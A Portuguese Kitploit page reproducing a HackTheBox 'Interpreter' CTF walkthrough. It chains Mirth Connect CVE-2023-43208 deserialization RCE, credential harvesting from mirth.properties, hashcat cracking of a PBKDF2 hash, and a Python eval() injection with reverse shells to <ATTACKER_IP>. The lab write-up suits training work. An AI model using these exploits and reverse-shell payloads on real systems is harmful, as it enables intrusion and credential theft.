Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Interpreter-HackTheBox — Walkthrough do HackTheBox Interpreter: RCE por desserialização no Mirth Connect via CVE-2023-43208, quebra de hash PBKDF2 e escalação de privilégios por injeção de eval() até root. | Kitploit
Ferramentas/GitHubGitHub/ledksv/interpreter-hackthebox
Quebra de SenhasEscalada de PrivilégiosReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoCTFTestes de Penetração

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Aprendizado e Educação
GitHubledksv/interpreter-hackthebox

Interpreter-HackTheBox

Walkthrough do HackTheBox Interpreter: RCE por desserialização no Mirth Connect via CVE-2023-43208, quebra de hash PBKDF2 e escalação de privilégios por injeção de eval() até root.

Ver Repositório
há 3 mesesAinda não revisado

Interpreter — HackTheBox

Plataforma: HackTheBox SO: Linux Status: Retirado — walkthrough completo publicado.

Walkthrough completo: l3dsec.com/walkthroughs/interpreter-htb


Cadeia de Ataque

root@kitploit:~
Nmap → Mirth Connect 4.4.0 (80/443)
  → CVE-2023-43208 RCE por desserialização Java não autenticada
    → Shell como mirth
      → mirth.properties → credenciais MySQL
        → MySQL → hash PBKDF2 de sedric → hashcat → SSH → USER FLAG
          → notif.py em execução como root em 127.0.0.1:54321
            → injeção eval() via POST XML → ROOT SHELL → ROOT FLAG

1. Enumeração

root@kitploit:~
nmap -sV -sC <TARGET_IP> -Pn
root@kitploit:~
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 9.2p1 (Debian)
80/tcp  open  http    Jetty (Mirth Connect)
443/tcp open  ssl     Jetty SSL (Mirth Connect)

Fingerprint de versão via API REST do Mirth:

root@kitploit:~
curl -sk https://<TARGET_IP>/api/server/version -H "X-Requested-With: XMLHttpRequest"
# Returns: 4.4.0

2. Foothold Inicial — CVE-2023-43208

Mirth Connect 4.4.0 é vulnerável a RCE não autenticada via desserialização Java:

root@kitploit:~
use exploit/multi/http/mirth_connect_cve_2023_43208
set RHOSTS <TARGET_IP>
set RPORT 443
set LHOST <ATTACKER_IP>
set FETCH_WRITABLE_DIR /tmp
set payload cmd/unix/reverse_bash
exploit

Shell como mirth.


3. Coleta de Credenciais

root@kitploit:~
find / -name "mirth.properties" 2>/dev/null
# /usr/local/mirthconnect/conf/mirth.properties
# database.username = mirthdb
# database.password = <redacted>
# database.url = jdbc:mariadb://localhost:3306/mc_bdd_prod

mysql -u mirthdb -p'<db_password>' mc_bdd_prod

A enumeração do MySQL revela o usuário sedric com um hash PBKDF2, e um canal HL7 encaminhando XML para http://127.0.0.1:54321/addPatient.


4. User Flag — Quebra de Hash

root@kitploit:~
hashcat -m 10900 hash.txt /usr/share/wordlists/rockyou.txt

Hash quebrado. SSH como sedric, leia /home/sedric/user.txt.


5. Escalação de Privilégios — Injeção eval()

notif.py é executado como root e escuta em 127.0.0.1:54321/addPatient — o mesmo endpoint para o qual o Mirth encaminha XML. Ele passa o campo XML firstname diretamente para o eval() do Python.

Payload a partir do shell mirth:

root@kitploit:~
import urllib.request, base64
from urllib.request import Request

cmd = "bash -i >& /dev/tcp/<ATTACKER_IP>/9004 0>&1"
b64 = base64.b64encode(cmd.encode()).decode()
inj = f"{{exec(__import__('base64').b64decode('{b64}').decode())}}"
xml = f"<patient><firstname>{inj}</firstname><lastname>x</lastname></patient>"

req = Request(
    "http://127.0.0.1:54321/addPatient",
    data=xml.encode(),
    headers={"Content-Type": "application/xml"}
)
urllib.request.urlopen(req)

Root shell recebido no listener.


Flags

FlagValor
Userredacted
Rootredacted

Apenas para fins educacionais. Teste somente sistemas que você possui ou tem permissão escrita explícita para testar.

Baixar ferramenta